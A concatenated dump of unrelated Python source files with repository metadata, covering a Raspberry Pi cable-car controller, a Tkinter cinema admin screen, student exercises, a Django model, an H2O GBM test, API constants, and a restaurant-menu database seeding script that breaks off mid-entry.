GPIO.remove_event_detect (ROTARY_ENCODER)
return "RPM counter reseted"
# reset counter
if command1 == "/resetcounter":
GPIO.remove_event_detect (23)
global counter
counter=0
return "counter reseted"
#RPM need not to be reseted
if command1 == "/getlux":
import LuxSensor39
LuxSensor39.enable()
return LuxSensor39.getLight()
LuxSensor39.disable()
if command1 == "/stopcar":
GPIO.remove_event_detect (HALL_SENSOR)
drivePWM.select(6,0)
return "Cable car stoped"
if command1 == "/alldeviceoff":
drivePWM.select(0,0)
drivePWM.select(1,0)
drivePWM.select(2,0)
drivePWM.select(3,0)
drivePWM.select(4,0)
drivePWM.select(5,0)
drivePWM.select(6,0)
return "All Devices are set to zero"
else:
return "Wrong Selection.Type help!!"
if __name__ == '__main__':
Script.run()
| [
"sundar shrestha"
] | sundar shrestha |
719747e9fd97b7338adfa4bb012c7e8acd5be9d4 | 6213d20df981338bd0a0638190b93aeaa2356088 | /adminscherm.py | faa346a5b30de1615c8b642058893e48d8b6d568 | [] | no_license | Pengelz/thuisbioscoop | 3130ee9bd6cd6235f81ee5355fe7f6d4089addc9 | 73682d1a84cab0b3dc7df63ffd4bbafffe5d3567 | refs/heads/master | 2021-01-10T16:06:46.205024 | 2015-10-30T11:32:51 | 2015-10-30T11:32:51 | 44,962,794 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | from tkinter import *
from csv import DictReader
import datetime
def adminscherm(id):
window = Tk()
window.geometry('500x200')
def getUsername(id):
username = ""
with open('database/users.csv') as csvfile:
reader = DictReader(csvfile)
for row in reader:
if row['id'] == id:
username = row['username']
return username
def getInfo(username):
info = []
with open('database/gekocht.csv') as csvfile:
reader = DictReader(csvfile)
for row in reader:
if row['aanbieder'] == username:
row['username'] = getUsername(row['id'])
info.append(row)
return info
def showInfo(sorted_info):
y = 10
sorted_titels = []
sorted_time = []
for aankoop in sorted_info:
if aankoop['titel'] not in sorted_titels and aankoop['starttijd'] not in sorted_time:
sorted_titels.append(aankoop['titel'])
sorted_time.append(aankoop['starttijd'])
titelLabel = Label(master=window, text=aankoop['titel'])
titelLabel.place(x=10,y=y)
timeLabel = Label(master=window, text=datetime.datetime.fromtimestamp(int(aankoop['starttijd'])).strftime("%H:%M %d-%m-%Y"))
timeLabel.place(x=100, y=y)
bezoekers = []
for aankoop2 in info:
if aankoop2['titel'] == aankoop['titel'] and aankoop2['starttijd'] == aankoop['starttijd']:
bezoekers.append(aankoop2['username'])
sorted_bezoekers = sorted(bezoekers)
for bezoeker in sorted_bezoekers:
bezoekerLabel = Label(master=window, text=bezoeker)
bezoekerLabel.place(x=210, y=y)
y+=20
username = getUsername(id)
info = getInfo(username)
sorted_info = sorted(info, key= lambda aankoop: aankoop['starttijd'])
showInfo(sorted_info)
window.mainloop() | [
"mbeunk@live.nl"
] | mbeunk@live.nl |
ed58aea99de7d9a14d3c047e505b21ef18ed34ae | b39ec77a8f5a5779edcecf5a09c39224472fd139 | /Clase06/propagar_6.1.py | 02226f7ba447903ba4f57b208c3d319866601321 | [] | no_license | GonzaloMonteodorisio/ejercicios-python-unsam | 76b6288491ccba8f44b819c26bed4811268e995e | 37ba16197107717a4c582eb552175e1c981c286b | refs/heads/main | 2023-07-28T07:18:10.178029 | 2021-09-15T05:42:46 | 2021-09-15T05:42:46 | 406,627,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | def propagar_al_vecino(l):
modif = False
n = len(l)
for i,e in enumerate(l):
if e==1 and i<n-1 and l[i+1]==0:
l[i+1] = 1
modif = True
if e==1 and i>0 and l[i-1]==0:
l[i-1] = 1
modif = True
return modif
def propagar(l):
m = l.copy()
veces=0
while propagar_al_vecino(l):
veces += 1
print(f"Repetí {veces} veces la función propagar_al_vecino.")
print(f"Con input {m}")
print(f"Y obtuve {l}")
return m
def main():
propagar([0,0,0,0,1])
propagar([0,0,1,0,0])
propagar([1,0,0,0,0])
main()
# Preguntas:
# 1. ¿Por qué los tests l[i+1]==0 y l[i-1]==0 de la función propagar_al_vecino no causan un IndexError en los bordes de la lista? 2. ¿Por qué propagar([0,0,0,0,1]) y propagar([1,0,0,0,0]), siendo entradas perfectamente simétricas, no generan la misma cantidad de repeticiones de llamadas a la función propagar_al_vecino?
# 3. Sobre la complejidad. Si te sale, calculá: * ¿Cuántas veces como máximo se puede repetir el ciclo while en una lista de largo n? * ¿Cuántas operaciones hace "propagar_al_vecino" en una lista de largo n? * Entonces, ¿cuántas operaciones hace como máximo esta versión de propagar en una lista de largo n? ¿Es un algoritmo de complejidad lineal o cuadrática? | [
"gonzalomonteodorisio@gmail.com"
] | gonzalomonteodorisio@gmail.com |
9c516dad1b8574df54a918eabd85742abeef70de | 2beff20ee54add8be48e137d175101c6323c1455 | /console/models.py | da3b73c8c57a34a5934e66c9a9a013124e8f0dcb | [] | no_license | max7patek/spoticode | 1d7581f1cec5025b13ce7015c24bc898285f3d28 | 9e4e5e1307722f504680b4f1bbfb5dbb658631c9 | refs/heads/master | 2020-04-26T11:13:42.964371 | 2019-03-05T01:48:37 | 2019-03-05T01:48:37 | 173,509,662 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | from django.db import models
import allauth.socialaccount.models as authmodels
#print(dir(authmodels))
class SavedProgram(models.Model):
user = models.ForeignKey(authmodels.get_user_model(), on_delete=models.SET_NULL, null=True)
script = models.TextField(null=True)
name = models.TextField()
class Meta:
unique_together=('user', 'name')
| [
"max7patek@gmail.com"
] | max7patek@gmail.com |
017c76ac669280e38247d059908c1b41444fef25 | 13592686dbc4e64d98183e2c7a950f28c3e62638 | /clases/ciclowhile.py | a20321562318f9a101f3b0fedf81d3ed46a9c281 | [] | no_license | weincoder/introprogramacion | 33e78ec08ff3f2c2e543e060ab0c759e26726082 | 03daaef00d14b9c2c7c7f0a971679a21a08e3d9e | refs/heads/main | 2023-04-25T00:50:29.087197 | 2021-05-20T12:43:40 | 2021-05-20T12:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | #----Mensajes----#
MENSAJE_SALUDAR = 'Bienvenido!! te apoyaré ahorrando'
MENSAJE_AHORRO = 'LLEVAS AHORRADO ...'
PREGUNTAR_VALOR_CPU = 'Cuanto vale el pc que deseas? : '
PREGUNTAR_CUANTO_TIENE = 'Cuanto llevas ahorrado? : '
#---Entradas---#
print(MENSAJE_SALUDAR)
valor = float (input(PREGUNTAR_VALOR_CPU))
ahorrado = float (input(PREGUNTAR_CUANTO_TIENE))
while (valor > ahorrado):
print (MENSAJE_AHORRO, ahorrado, "te faltan ...", valor - ahorrado)
ahorrado = ahorrado + 1000
print (valor == ahorrado) | [
"danielherresan@gmail.com"
] | danielherresan@gmail.com |
37e98bd78155495d5c6dc329da0a8a2a30af3ac3 | 4288836ca203930f5bb53b6b078d201561774857 | /lib/constants.py | 3db4c3da08ec4a8803b9a0b403a3fb2028353bc4 | [
"MIT"
] | permissive | HackMyChurch/aelf-dailyreadings-server | 92e9ab43530077390ceb8f703b8a2f18bf004b5b | 0b65a31219f0e72f39c6f4c8c8016bb5a677dfe6 | refs/heads/master | 2022-03-15T07:48:09.537698 | 2022-03-06T22:48:37 | 2022-03-06T22:48:37 | 60,039,579 | 8 | 4 | null | 2019-07-03T08:42:00 | 2016-05-30T21:21:37 | Python | UTF-8 | Python | false | false | 1,820 | py | # -*- coding: utf-8 -*-
import os
CURRENT_VERSION = 66
# Base URL / Paths
AELF_JSON="https://api.aelf.org/v1/{office}/{year:04d}-{month:02d}-{day:02d}/{region}"
AELF_SITE="http://www.aelf.org/{year:04d}-{month:02d}-{day:02d}/{region}/{office}"
EPITRE_CO_JSON="http://epitre.co/api/1.0/ref/fr-lit/{reference}"
ASSET_BASE_PATH=os.path.join(os.path.abspath(os.path.dirname(__file__)), "../assets")
DEFAULT_REGION="romain"
# HTTP client configuration
HEADERS={'User-Agent': 'AELF - Lectures du jour - API - cathogeek@epitre.co'}
HTTP_TIMEOUT = 10 # seconds
# French constants
DETERMINANTS = [
'd', 'l', 'l\'', 'le', 'la', 'les', 'un', 'une', 'des', 'du', 'de', 'd\'', 'au', 'à',
'ma', 'ta', 'sa', 'mon', 'ton', 'son', 'notre', 'votre', 'leur,'
'mais', 'ou', 'et', 'donc', 'sur', 'sans',
'ce', 'ces', 'cela', 'cette', 'celui', 'celle', 'celles', 'ceux', 'ça',
'pour', 'afin', 'contre', 'avec', 'en',
# Most common common names
'saint', 'sainte', 'anniversaire', 'ordination', 'sermon', 'homelie', 'homélie',
'grand', 'grande',
];
# HTML
HTML_BLOCK_ELEMENTS = [
"body",
"section", "nav",
"header", "footer",
"table", "thread", "tbody", "td", "tr", "th",
"div", "p", "blockquote",
]
# Simple translation tables
OFFICE_NAME = {
"messes": "messe",
}
ID_TO_TITLE = {
'benediction': 'Bénédiction',
}
# Region specific settings
REGION_NOTRE_PERE_NEW = ['belgique', 'afrique']
# Internal Monitoring
# The application syncs up to 30 days in the future. This gives 2 week to fix errors
STATUS_DAYS_TO_MONITOR = int(os.environ.get('AELF_STATUS_DAYS_TO_MONITOR', 45))
# 404 error become fatal 2 weeks ahead
STATUS_DAYS_404_FATAL = 15
STATUS_PROBE_INTERVAL = 3600 * 24
STATUS_PROBE_INTERVAL_ERROR = 60 * 15
| [
"jt@yadutaf.fr"
] | jt@yadutaf.fr |
1f1be68bb97314811a10391916586bfb52b4587e | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_algos/gbm/pyunit_generate_synthetic_GBM_data.py | 69e8d4b6e6eb13aa8f86737692e0663c459a57fe | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 3,436 | py | import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
import numpy as np
# This test will generate synthetic GBM dataset using a randomly defined GBM trees. If given to
# a GBM model, it should be able to perform well with this dataset since the assumptions associated with
# GBM are used to generate the dataset.
def test_define_dataset():
family = 'bernoulli' # can be any valid GLM families
nrow = 100000
ncol = 10
missing_fraction = 0
factorRange= 50
numericRange = 10
targetFactor = 2
realFrac = 0.3
intFrac = 0.3
enumFrac = 0.4
ntrees=10
max_depth=8
glmDataSet = generate_dataset(family, nrow, ncol, ntrees, max_depth, realFrac, intFrac, enumFrac,
missing_fraction, factorRange, numericRange, targetFactor)
#h2o.download_csv(glmDataSet, "/Users/.../dataset.csv") # save dataset
assert glmDataSet.nrow == nrow, "Dataset number of row: {0}, expected number of row: {1}".format(glmDataSet.nrow,
nrow)
assert glmDataSet.ncol == (1+ncol), "Dataset number of row: {0}, expected number of row: " \
"{1}".format(glmDataSet.ncol, (1+ncol))
def generate_dataset(family, nrow, ncol, ntrees, max_depth, realFrac, intFrac, enumFrac, missingFrac,
factorRange, numericRange, targetFactor):
if family=="bernoulli":
responseFactor = 2
elif family == 'gaussian':
responseFactor = 1;
else :
responseFactor = targetFactor
trainData = random_dataset(nrow, ncol, realFrac=realFrac, intFrac=intFrac, enumFrac=enumFrac, factorR=factorRange,
integerR=numericRange, responseFactor=responseFactor, misFrac=missingFrac)
myX = trainData.names
myY = 'response'
myX.remove(myY)
m = H2OGradientBoostingEstimator(distribution=family,
ntrees=ntrees,
max_depth=max_depth)
m.train(training_frame=trainData,x=myX,y= myY)
f2 = m.predict(trainData)
finalDataset = trainData[myX]
finalDataset = finalDataset.cbind(f2[0])
finalDataset.set_name(col=finalDataset.ncols-1, name='response')
h2o.remove(trainData)
return finalDataset
def random_dataset(nrow, ncol, realFrac = 0.4, intFrac = 0.3, enumFrac = 0.3, factorR = 10, integerR=100,
responseFactor = 1, misFrac=0.01, randSeed=None):
fractions = dict()
fractions["real_fraction"] = realFrac # Right now we are dropping string columns, so no point in having them.
fractions["categorical_fraction"] = enumFrac
fractions["integer_fraction"] = intFrac
fractions["time_fraction"] = 0
fractions["string_fraction"] = 0 # Right now we are dropping string columns, so no point in having them.
fractions["binary_fraction"] = 0
df = h2o.create_frame(rows=nrow, cols=ncol, missing_fraction=misFrac, has_response=True,
response_factors = responseFactor, integer_range=integerR,
seed=randSeed, **fractions)
return df
if __name__ == "__main__":
pyunit_utils.standalone_test(test_define_dataset)
else:
test_define_dataset()
| [
"noreply@github.com"
] | Winfredemalx54.noreply@github.com |
52c7d93fc07ed9726c863d7145077f3d1e1d0e95 | e952ddf766fe5374105f242937439b925cdbb82b | /proj3py/map.py | e71416f7c8101b268c1fbf53202b695ca1bfc2c3 | [] | no_license | Raenbows/Python-p3 | 8a7155be1b594fab5714c175cfbc5ad33c710096 | 1e0cb070649a6d6040357b33ffe6bd68c3f175b2 | refs/heads/master | 2016-09-06T19:18:53.875706 | 2015-03-08T04:58:41 | 2015-03-08T04:58:41 | 31,820,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | #map.py
#Rachael Byrkit rmb11d
from random import randint
#0 : empty
#1 : player
#2 : enemy (pyro)
#3 : trap (backstab)
#4 : backpack (intel)
class Map:
def __init__(self):
self.map=[[0 for x in range (5)] for x in range (5)]
def setMap(self):
#set player locationn
self.map[2][0]=1
#set trap
self.map[randint(0,4)][randint(0,4)] = 3
#set enemies
for x in range (0,4):
randx=randint(0,4)
randy=randint(0,4)
if self.map[randx][randy] is not 0:
break
else:
self.map[randx][randy]= 2
#set backpack
randx=randint(0,4)
randy=randint(0,4)
while self.map[randx][randy] is not 0:
randx=randint(0,4)
randy=randint(0,4)
else:
self.map[randx][randy]=4
#def nextMove:
| [
"rbyrkit@gmail.com"
] | rbyrkit@gmail.com |
83b141bc76063ab75f1362836c7336ccb0d281c8 | 54ab3131f6198aacc8238021fbaefc20bf559168 | /dbpopfeb3.py | 1775c17ba27a1571a4dd3c0b726379b604d0466f | [] | no_license | mygethub-99/project3submit1 | ffe5330b3ae7cbd0c0c2cc6cdaeb30dbd1869e42 | 4617ce745687ddffa5b85aed94e2b14be41d6bb2 | refs/heads/master | 2021-01-10T06:53:38.806198 | 2016-02-27T13:29:37 | 2016-02-27T13:29:37 | 51,455,093 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,578 | py | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from feb32015db import Restaurant, Base, MenuItem, User
engine = create_engine('sqlite:///restaurantmapped.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Create dummy user
User1 = User(name="Owen Workman", email="tomakeitcount@gmail.com",
picture='/static/healthdepart.png')
session.add(User1)
session.commit()
# Menu for UrbanBurger
restaurant1 = Restaurant(user_id=1, name="Urban Burger", address="1321 \
Commerce St, The Adolphus Hotel, Dallas, TX 75202", phone="989-234-6070", \
cuisine_cat="American", health_rating= "Poor", picture \
='/static/urbanburger.png')
session.add(restaurant1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce",
price="$7.50", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem1 = MenuItem(user_id=1, name="French Fries", description="with garlic \
and parmesan",
price="$2.99", course="Appetizer", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken Burger", description="Juicy \
grilled chicken patty with tomato mayo and lettuce",
price="$5.50", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Chocolate Cake", description="fresh \
baked and served with ice cream",
price="$3.99", course="Dessert", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Sirloin Burger", description="Made with \
grade A beef",
price="$7.99", course="Entree", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Root Beer", description="16oz of \
refreshing goodness",
price="$1.99", course="Beverage", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Iced Tea", description="with Lemon",
price="$.99", course="Beverage", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Grilled Cheese Sandwich",
description="On texas toast with American Cheese", \
price="$3.49", course="Entree", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Veggie Burger", description="Made with \
freshest of ingredients and home grown spices",
price="$5.99", course="Entree", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Super Stir Fry
restaurant2 = Restaurant(user_id=1, name="Super Stir Fry", address="5500 \
Greenville Ave, Dallas, TX 75206", phone="989-245-6071", cuisine_cat="Asian",\
health_rating= "Poor", picture= '/static/chinese.jpg')
session.add(restaurant2)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Chicken Stir Fry", description="With \
your choice of noodles vegetables and sauces", price="$7.99", \
course="Entree", restaurant=restaurant2)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Peking Duck",
description=" A famous duck dish from Beijing[1] that has been prepared \
since the imperial era. The meat is prized for its thin, crisp skin, \
with authentic versions of the dish serving mostly the skin and little \
meat, sliced in front of the diners by the cook", price="$25", \
course="Entree", restaurant=restaurant2)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Spicy Tuna Roll", description="Seared \
rare ahi, avocado, edamame, cucumber with wasabi soy sauce ",
price="15", course="Entree", restaurant=restaurant2)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Nepali Momo ", description="Steamed \
dumplings made with vegetables, spices and meat. ",
price="12", course="Entree", restaurant=restaurant2)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Beef Noodle Soup", description="A \
Chinese noodle soup made of stewed or red braised beef, beef broth, \
vegetables and Chinese noodles.", price="14", course="Entree", \
restaurant=restaurant2)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Ramen", description="a Japanese noodle \
soup dish. It consists of Chinese-style wheat noodles served in a meat- or \
(occasionally) fish-based broth, often flavored with soy sauce or miso, and \
uses toppings such as sliced pork, dried seaweed, kamaboko, and green \
onions.", price="12", course="Entree", restaurant=restaurant2)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Jello Fruity", description="Jello with \
local fresh fruit", price="$4.50", course="Dessert", restaurant=restaurant2)
session.add(menuItem7)
session.commit()
menuItem10 = MenuItem(user_id=1, name="Hot Tea", description="Famous Asian \
Tea", price="$4.50", course="Beverage", restaurant=restaurant2)
session.add(menuItem10)
session.commit()
# Menu for Panda Garden
restaurant1 = Restaurant(user_id=1, name="Panda Garden",address="3511 Oak Lawn \
Ave, Dallas, TX 75219", phone="989-865-7530", cuisine_cat="Asian", \
health_rating= "Good", picture= '/static/stirfry.jpg')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Pho", description="a Vietnamese noodle \
soup consisting of broth, linguine-shaped rice noodles called banh pho, a \
few herbs, and meat.", price="$8.99", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chinese Dumplings", description="a \
common Chinese dumpling which generally consists of minced meat and finely \
chopped vegetables wrapped into a piece of dough skin. The skin can be \
either thin and elastic or thicker.", price="$6.99", course="Appetizer", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Gyoza", description="light seasoning \
of Japanese gyoza with salt and soy sauce, and in a thin gyoza wrapper", \
price="$9.95", course="Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Stinky Tofu", description="Taiwanese \
dish, deep fried fermented tofu served with pickled cabbage.", \
price="$6.99", course="Entree", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$9.50", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Jello Fruity", description="Jello \
with local fresh fruit", price="$4.50", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Hot Tea", description="Famous Asian Tea",\
price="$4.50", course="Beverage", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
# Menu for Thyme for that
restaurant1 = Restaurant(user_id=1, name="Thyme for That Vegetarian Cuisine", \
address="4901 Bryan St, Dallas, TX 75206-7613", phone="128-234-5550", \
cuisine_cat="Vegetarian", health_rating= "Excellent", picture= \
'/static/veg.jpg')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Tres Leches Cake", description="Rich, \
luscious sponge cake soaked in sweet milk and topped with vanilla bean \
whipped cream and strawberries.", price="$2.99", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Mushroom risotto", description=\
"Portabello mushrooms in a creamy risotto",
price="$5.99", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Honey Boba Shaved Snow",
description="Milk snow layered with honey boba, jasmine tea jelly, \
grass jelly, caramel, cream, and freshly made mochi", price="$4.50", \
course="Dessert", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Cauliflower Manchurian", description=\
"Golden fried cauliflower florets in a midly spiced soya,garlic sauce cooked \
with fresh cilantro, celery, chilies,ginger & green onions",
price="$6.95", course="Appetizer", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Aloo Gobi Burrito", description="Vegan \
goodness. Burrito filled with rice, garbanzo beans, curry sauce, potatoes \
(aloo), fried cauliflower (gobi) and chutney. Nom Nom", price="$7.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$6.80", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Juice and Smoothy Bar", description=\
"Pick of any Jice of Smoothy drink", price="$5.95", course="Beverage",\
restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Tony's Bistro
restaurant1 = Restaurant(user_id=1, name="Tony's Bistro", address="1322 \
Commerce St, The Adolphus Hotel, Dallas, TX 75202", phone="946-430-6070", \
cuisine_cat="Italian", health_rating= "Excellent", picture= \
'/static/tonysbistro.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Shellfish Tower", description=\
"Lobster, shrimp, sea snails, crawfish, stacked into a delicious tower", \
price="$13.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken and Rice", description=\
"Chicken... and rice", price="$4.95", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Mom's Spaghetti", description=\
"Spaghetti with some incredible tomato sauce made by mom", price="$6.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Choc Full O\' Mint (Smitten\'s \
Fresh Mint Chip ice cream)",
description="Milk, cream, salt, ..., Liquid nitrogen magic. \
Signed waver required.", price="$3.95", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Tonkatsu Ramen", description=\
"Noodles in a delicious pork-based broth with a soft-boiled egg", \
price="$7.95", course="Entree",restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Noodle Bowl", description="Noodles in \
a delicious pork juice", price="$3.95", course="Appetizer",\
restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Carmel Cake", description=\
"Hot fresh cake with warm carmel", price="$4.95", course="Dessert",\
restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Coke Fountain", description=\
"All famous Coke products", price="$2.95", course="Beverage",\
restaurant=restaurant1)
session.add(menuItem8)
session.commit()
menuItem9 = MenuItem(user_id=1, name="Wine List", description="We have red \
and white wine", price="$4.95", course="Beverage",restaurant=restaurant1)
session.add(menuItem9)
session.commit()
# Menu for Andala's
restaurant1 = Restaurant(user_id=1, name="Andala's", address="10477 Lombardy \
Ln, Dallas, TX 75220-4349", phone="989-234-6070", cuisine_cat="Italian", \
health_rating= "Good", picture= '/static/andala.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Lamb Curry", description="Slow cook \
that thang in a pool of tomatoes, onions and alllll those tasty Indian \
spices. Mmmm.",price="$9.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken Marsala", description="Chicken \
cooked in Marsala wine sauce with mushrooms", price="$7.95", course="Entree",\
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Potstickers", description="Delicious \
chicken and veggies encapsulated in fried dough.", price="$6.50", course=\
"Appetizer", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Nigiri Sampler", description="Maguro, \
Sake, Hamachi, Unagi, Uni, TORO!", price="$6.75", course="Appetizer", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$7.00", \
course="Entree", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Cake of the Day", description=\
"Daily pick of Chocolate, Carmel, Strawberry or Vanilla homemade \
cake", price="$3.50", course="Dessert", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Soft Drink Bar", description=\
"Pick from large selection of soft drinks.", price="$2.75", course=\
"Beverage", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Desert Bar", description="Pick from \
large selection of cakes, cookies, and ice cream.", price="$4.75", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Auntie Ann's
restaurant1 = Restaurant(user_id=1, name="Auntie Ann\'s Diner' ", address=\
"8300 Preston Road, Dallas, TX 75225", phone="989-504-6045", cuisine_cat=\
"American", health_rating= "Fair", picture = '/static/auntannies.jpg')
session.add(restaurant1)
session.commit()
menuItem9 = MenuItem(user_id=1, name="Chicken Fried Steak",
description="Fresh battered sirloin steak fried and smothered with \
cream gravy", price="$8.99", course="Entree", restaurant=restaurant1)
session.add(menuItem9)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Boysenberry Sorbet", description="An \
unsettlingly huge amount of ripe berries turned into frozen (and seedless) \
awesomeness", price="$2.99", course="Dessert", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Broiled salmon", description="Salmon \
fillet marinated with fresh herbs and broiled hot & fast", price="$10.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Morels on toast (seasonal)", \
description="Wild morel mushrooms fried in butter, served on herbed \
toast slices", price="$7.50", course="Appetizer", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Tandoori Chicken", description="Chicken \
marinated in yoghurt and seasoned with a spicy mix(chilli, tamarind among \
others) and slow cooked in a cylindrical clay or metal oven which gets \
its heat from burning charcoal.", price="$8.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$9.50", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem10 = MenuItem(user_id=1, name="Spinach Ice Cream", description=\
"vanilla ice cream made with organic spinach leaves", price="$1.99", \
course="Dessert", restaurant=restaurant1)
session.add(menuItem10)
session.commit()
menuItem11 = MenuItem(user_id=1, name="Soft Drink Bar", description=\
"Variety of cold soft drinks", price="$1.99", course="Beverage", \
restaurant=restaurant1)
session.add(menuItem11)
session.commit()
# Menu for Cocina Y Amor
restaurant1 = Restaurant(user_id=1, name="Cocina Y Amor ", address=\
"2401 McKinney Ave, Dallas, TX 75201", phone="981-232-6570", cuisine_cat=\
"Mexican", health_rating= "Poor", picture= '/static/Mexican.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Super Burrito Al Pastor",
description="Marinated Pork, Rice, Beans, Avocado,Cilantro, Salsa, \
Tortilla", price="$5.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Cachapa", description="Golden brown, \
corn-based Venezuelan pancake; usually stuffed with queso telita or queso \
